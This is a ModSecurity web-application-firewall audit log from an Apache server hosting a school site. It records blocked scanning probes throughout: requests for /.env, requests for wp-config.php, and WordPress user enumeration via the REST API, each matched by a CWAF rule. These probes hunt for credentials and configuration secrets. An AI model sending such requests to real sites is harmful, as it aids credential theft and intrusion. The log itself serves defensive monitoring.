ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747040372017521 3001 (- - -) Stopwatch2: 1747040372017521 3001; combined=1274, p1=446, p2=797, p3=0, p4=0, p5=31, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e31cf36b-Z-- --05f7d802-A-- [12/May/2025:16:02:31 +0700] aCG5J34i-S7TW27OkGmR_QAAAMw 103.236.140.4 35392 103.236.140.4 8181 --05f7d802-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.140 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.140 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 YaBrowser/19.9.1.64 (beta) Yowser/2.5 Safari/537.36 Accept-Charset: utf-8 --05f7d802-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --05f7d802-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747040551276526 869 (- - -) Stopwatch2: 1747040551276526 869; combined=336, p1=285, p2=0, p3=0, p4=0, p5=50, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --05f7d802-Z-- --e8324856-A-- [12/May/2025:16:03:00 +0700] aCG5RH4i-S7TW27OkGmR_wAAANE 103.236.140.4 35396 103.236.140.4 8181 --e8324856-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 189.113.69.14 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 189.113.69.14 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e8324856-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e8324856-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747040580017516 3062 (- - -) Stopwatch2: 1747040580017516 3062; combined=1374, p1=440, p2=838, p3=0, p4=0, p5=96, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e8324856-Z-- --485c983a-A-- [12/May/2025:16:04:50 +0700] aCG5shLjIumP119c9pomjQAAAAY 103.236.140.4 35414 103.236.140.4 8181 --485c983a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.236.12.146 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.236.12.146 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --485c983a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --485c983a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747040690672201 3480 (- - -) Stopwatch2: 1747040690672201 3480; combined=1454, p1=463, p2=958, p3=0, p4=0, p5=33, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --485c983a-Z-- --3825cc16-A-- [12/May/2025:16:38:24 +0700] aCHBkBLjIumP119c9pomtwAAABQ 103.236.140.4 35604 103.236.140.4 8181 --3825cc16-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.147.247.9 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.147.247.9 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3825cc16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3825cc16-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747042704750090 3574 (- - -) Stopwatch2: 1747042704750090 3574; combined=1484, p1=497, p2=955, p3=0, p4=0, p5=32, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3825cc16-Z-- --d80d1b45-A-- [12/May/2025:16:46:43 +0700] aCHDgxLjIumP119c9pomxAAAABg 103.236.140.4 35684 103.236.140.4 8181 --d80d1b45-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 197.155.65.186 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 197.155.65.186 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d80d1b45-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d80d1b45-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747043203626771 3189 (- - -) Stopwatch2: 1747043203626771 3189; combined=1422, p1=483, p2=907, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d80d1b45-Z-- --c8354f11-A-- [12/May/2025:17:04:31 +0700] aCHHrxLjIumP119c9pom4wAAAAo 103.236.140.4 35870 103.236.140.4 8181 --c8354f11-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 121.135.186.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 121.135.186.198 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c8354f11-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c8354f11-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747044271178517 3087 (- - -) Stopwatch2: 1747044271178517 3087; combined=1281, p1=426, p2=819, p3=0, p4=0, p5=36, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c8354f11-Z-- --e0fb4021-A-- [12/May/2025:17:08:15 +0700] aCHIjxLjIumP119c9pom8wAAAAc 103.236.140.4 35988 103.236.140.4 8181 --e0fb4021-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 138.197.152.158 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 138.197.152.158 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --e0fb4021-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0fb4021-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747044495087329 822 (- - -) Stopwatch2: 1747044495087329 822; combined=317, p1=281, p2=0, p3=0, p4=0, p5=36, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0fb4021-Z-- --a23e1a2f-A-- [12/May/2025:17:09:49 +0700] aCHI7RLjIumP119c9pom9QAAAAs 103.236.140.4 35992 103.236.140.4 8181 --a23e1a2f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 83.99.147.120 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 83.99.147.120 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a23e1a2f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a23e1a2f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747044589506322 2838 (- - -) Stopwatch2: 1747044589506322 2838; combined=1238, p1=423, p2=786, p3=0, p4=0, p5=29, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a23e1a2f-Z-- --ec703568-A-- [12/May/2025:17:10:57 +0700] aCHJMRLjIumP119c9pom-QAAABM 103.236.140.4 36006 103.236.140.4 8181 --ec703568-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.81.13.190 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.81.13.190 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ec703568-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec703568-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747044657443208 3171 (- - -) Stopwatch2: 1747044657443208 3171; combined=1393, p1=462, p2=898, p3=0, p4=0, p5=32, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec703568-Z-- --2f895614-A-- [12/May/2025:18:22:05 +0700] aCHZ3RKpX3ymKhxxBshUiAAAAFU 103.236.140.4 40434 103.236.140.4 8181 --2f895614-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 178.128.207.138 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 178.128.207.138 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --2f895614-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2f895614-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747048925240063 872 (- - -) Stopwatch2: 1747048925240063 872; combined=397, p1=356, p2=0, p3=0, p4=0, p5=40, sr=129, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2f895614-Z-- --c168ee41-A-- [12/May/2025:18:28:15 +0700] aCHbTxKpX3ymKhxxBshUiwAAAEA 103.236.140.4 40466 103.236.140.4 8181 --c168ee41-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 94.26.90.247 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 94.26.90.247 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 Accept: */* --c168ee41-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c168ee41-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747049295230887 896 (- - -) Stopwatch2: 1747049295230887 896; combined=326, p1=287, p2=0, p3=0, p4=0, p5=39, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c168ee41-Z-- --a260ab36-A-- [12/May/2025:18:44:08 +0700] aCHfCBLjIumP119c9pooNQAAAAg 103.236.140.4 40540 103.236.140.4 8181 --a260ab36-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 165.227.84.14 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 165.227.84.14 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --a260ab36-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a260ab36-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747050248970025 780 (- - -) Stopwatch2: 1747050248970025 780; combined=340, p1=299, p2=0, p3=0, p4=0, p5=41, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a260ab36-Z-- --84eb3c12-A-- [12/May/2025:19:15:27 +0700] aCHmX-ll0ld2l7Li0sdWeAAAAIY 103.236.140.4 42344 103.236.140.4 8181 --84eb3c12-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 121.135.186.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 121.135.186.198 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --84eb3c12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --84eb3c12-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747052127544710 3337 (- - -) Stopwatch2: 1747052127544710 3337; combined=1461, p1=475, p2=949, p3=0, p4=0, p5=37, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --84eb3c12-Z-- --c6e35a04-A-- [12/May/2025:19:24:42 +0700] aCHoihLjIumP119c9popPgAAAAU 103.236.140.4 42694 103.236.140.4 8181 --c6e35a04-B-- GET /.well-known/pki-validation/wp-config.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 13.79.186.161 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 13.79.186.161 X-Forwarded-Proto: http Connection: close --c6e35a04-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c6e35a04-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747052682579994 787 (- - -) Stopwatch2: 1747052682579994 787; combined=307, p1=270, p2=0, p3=0, p4=0, p5=36, sr=96, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c6e35a04-Z-- --3da4936d-A-- [12/May/2025:19:35:40 +0700] aCHrHBKpX3ymKhxxBshV5AAAAEQ 103.236.140.4 44082 103.236.140.4 8181 --3da4936d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 109.108.115.174 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 109.108.115.174 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3da4936d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3da4936d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747053340174270 2974 (- - -) Stopwatch2: 1747053340174270 2974; combined=1290, p1=424, p2=833, p3=0, p4=0, p5=33, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3da4936d-Z-- --644c5a31-A-- [12/May/2025:19:49:13 +0700] aCHuSRKpX3ymKhxxBshV6AAAAEk 103.236.140.4 44132 103.236.140.4 8181 --644c5a31-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.113 Safari/537.36 Vivaldi/2.1.1337.51 Accept-Charset: utf-8 --644c5a31-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --644c5a31-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747054153238401 870 (- - -) Stopwatch2: 1747054153238401 870; combined=342, p1=300, p2=0, p3=0, p4=0, p5=42, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --644c5a31-Z-- --22606709-A-- [12/May/2025:20:14:40 +0700] aCH0QBLjIumP119c9poquQAAAAo 103.236.140.4 44262 103.236.140.4 8181 --22606709-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 139.59.136.184 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 139.59.136.184 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --22606709-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --22606709-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747055680303122 743 (- - -) Stopwatch2: 1747055680303122 743; combined=286, p1=250, p2=0, p3=0, p4=0, p5=35, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --22606709-Z-- --1130e060-A-- [12/May/2025:20:23:28 +0700] aCH2UBLjIumP119c9poqzwAAAAw 103.236.140.4 44378 103.236.140.4 8181 --1130e060-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 139.255.114.162 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 139.255.114.162 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1130e060-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1130e060-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
